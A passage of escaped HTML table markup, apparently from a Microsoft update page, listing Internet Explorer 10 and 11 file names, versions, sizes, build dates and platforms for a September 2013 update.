class=\"sbody-td\">2,671,616</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.2.9200.20830</td><td class=\"sbody-td\">277,504</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">51,712</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">39,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">51,712</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">39,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">136,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">136,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">1,084,928</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">1,084,928</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">15,404,544</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">25,923</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">526,336</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">15,414,784</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">25,923</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">531,456</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">148,992</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">148,992</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">3,959,296</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">3,966,976</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.9200.16720</td><td class=\"sbody-td\">855,552</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.9200.20830</td><td class=\"sbody-td\">854,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">770,648</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:54</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">770,648</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">00:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">493,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">20-Sep-2013</td><td class=\"sbody-td\">23:06</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">493,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">20-Sep-2013</td><td class=\"sbody-td\">22:41</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">10.0.9200.16721</td><td class=\"sbody-td\">14,335,488</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,706,432</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">03:30</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">3,228</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:21</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">10.0.9200.20831</td><td class=\"sbody-td\">14,364,672</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">2,706,432</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">03:05</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">3,228</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:22</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">33,280</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">61,440</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">33,280</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">61,440</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie9props.propdesc</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,843</td><td class=\"sbody-td\">09-Oct-2012</td><td class=\"sbody-td\">01:08</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">13,761,024</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">391,168</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">25,923</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:21</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie9props.propdesc</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,843</td><td class=\"sbody-td\">10-Oct-2012</td><td class=\"sbody-td\">01:36</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">13,737,984</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">391,168</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">25,923</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">22:22</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,876,928</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">2,880,000</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.9200.16720</td><td class=\"sbody-td\">690,688</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.9200.20830</td><td class=\"sbody-td\">690,688</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">1,141,248</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">1,137,664</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">39,424</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">1,767,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">38,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">1,777,152</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie9props.propdesc</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,843</td><td class=\"sbody-td\">09-Oct-2012</td><td class=\"sbody-td\">01:08</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registeriepkeys.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie9props.propdesc</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,843</td><td class=\"sbody-td\">10-Oct-2012</td><td class=\"sbody-td\">01:36</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registeriepkeys.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">257,536</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">257,536</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">236,032</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">236,032</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msdbg2.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">285,080</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdm.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">392,080</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmproxy100.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">70,568</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmsetup.exe</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">69,120</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msdbg2.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">285,080</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdm.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">392,080</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmproxy100.dll</td><td class=\"sbody-td\">11.0.50613.2</td><td class=\"sbody-td\">70,568</td><td class=\"sbody-td\">06-Jul-2012</td><td class=\"sbody-td\">19:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pdmsetup.exe</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">69,120</td><td class=\"sbody-td\">21-Sep-2013</td><td class=\"sbody-td\">02:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">2,048,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.2.9200.16720</td><td class=\"sbody-td\">217,600</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">2,079,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.2.9200.20830</td><td class=\"sbody-td\">219,648</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">817,664</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:28</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">817,664</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">10.0.9200.16720</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">10.0.9200.20830</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:36</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 11 </h3><h4 class=\"sbody-h4\">Internet Explorer 11 on all supported x86-based versions of Windows 7 </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">11.0.9600.16411</td><td class=\"sbody-td\">1,143,296</td><td class=\"sbody-td\">25-Sep-2013</td><td class=\"sbody-td\">04:45</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">11.0.9600.16411</td><td class=\"sbody-td\">43,008</td><td class=\"sbody-td\">25-Sep-2013</td><td class=\"sbody-td\">06:35</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">11.0.9600.16411</td><td class=\"sbody-td\">1,818,112</td><td class=\"sbody-td\">25-Sep-2013</td><td class=\"sbody-td\">04:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">F12resources.dll</td><td class=\"sbody-td\">11.0.9600.16411</td><td class=\"sbody-td\">7,211,008</td><td class=\"sbody-td\">25-Sep-2013</td><td class=\"sbody-td\">06:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">F12tools.dll</td><td class=\"sbody-td\">11.0.9600.16411</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">25-Sep-2013</td><td class=\"sbody-td\">06:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">F12.dll</td><td class=\"sbody-td\">11.0.9600.16411</td><td class=\"sbody-td\">1,587,200</td><td class=\"sbody-td\">25-Sep-2013</td><td class=\"sbody-td\">05:53</td><td class=\"sbody-td\&qu